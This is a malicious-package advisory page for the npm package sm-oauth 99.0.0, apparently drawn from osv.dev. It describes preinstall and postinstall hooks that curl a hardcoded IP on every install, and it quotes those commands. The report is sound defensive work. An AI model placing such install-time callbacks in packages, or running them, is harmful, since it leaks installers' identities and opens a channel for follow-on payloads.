npm

sm-oauth @99.0.0

Vulnerability report · Last retrieved from osv.dev August 24, 2026 at 9:16 AM UTC

Malicious

OSV ID

MAL-2026-14398

Ecosystem

npm

Summary

package.json declares preinstall and postinstall scripts that run curl -s http://16.192.173.5/sm-oauth/pre and curl -s http://16.192.173.5/sm-oauth/post on every npm install . The requests fire against a hardcoded bare-IP endpoint over plain HTTP, leaking the installer's network identity (source IP, install event, request metadata) to that endpoint and giving the operator a channel to serve follow-on content in the HTTP response. index.js self-identifies as a dependency-confusion test artifact and exports no functional library code; the package's only behavior on install is the outbound callback.

Source: amazon-inspector (98d60527238d1284ed569a2fa7611ff2b430e1ebfab579f597f42a1eb28f49bc)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.